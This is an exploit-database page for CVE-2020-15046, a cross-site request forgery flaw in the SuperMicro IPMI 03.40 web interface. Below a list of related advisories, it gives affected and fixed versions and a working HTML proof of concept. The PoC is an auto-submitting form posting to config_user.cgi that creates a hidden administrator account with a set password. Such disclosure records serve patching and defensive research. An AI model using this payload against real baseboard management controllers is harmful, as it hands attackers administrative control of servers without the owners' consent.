| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| SuperMicro IPMI 03.40 - Cross-Site Request Forgery (Add Admin) Vulnerability | 8 Jul 202000:00 | – | zdt | |
| SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin) Vulnerability | 15 Jul 202000:00 | – | zdt | |
| CVE-2020-15046 | 24 Jun 202023:15 | – | attackerkb | |
| CVE-2020-15046 | 8 Jun 202221:37 | – | circl | |
| SuperMicro Supermicro X10DRH-iT Cross-Site Request Forgery Vulnerability | 28 Jun 202000:00 | – | cnvd | |
| CVE-2020-15046 | 24 Jun 202022:25 | – | cve | |
| CVE-2020-15046 | 24 Jun 202022:25 | – | cvelist | |
| SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin) | 15 Jul 202000:00 | – | exploitdb | |
| EUVD-2020-7174 | 7 Oct 202500:30 | – | euvd | |
| CVE-2020-15046 | 24 Jun 202023:15 | – | nvd |
# Exploit Title: SuperMicro IPMI 03.40 - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.supermicro.com/
# Software Link: https://www.supermicro.com/en/solutions/management-software/bmc-resources
# Version: X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40
# CVE: CVE-2020-15046
# Source: https://www.totalpentest.com/post/supermicro-ipmi-webgui-cross-site-request-forgery
# Description:
# The web interface on Supermicro X10DRH-iT motherboards with BIOS 2.0a and
# IPMI firmware 03.40
# allows remote attackers to exploit a cgi/config_user.cgi CSRF issue to
add new admin users.
# The fixed versions are BIOS 3.2 and firmware 03.88.
# PoC :
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://SuperMicro-IP/cgi/config_user.cgi" method="POST">
<input type="hidden" name="username" value="JOKER" />
<input type="hidden" name="original_username" value="2" />
<input type="hidden" name="password" value="onebadday" />
<input type="hidden" name="new_privilege" value="4" />
<input type="submit" value="submit request" />
</form>
</body>
</html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation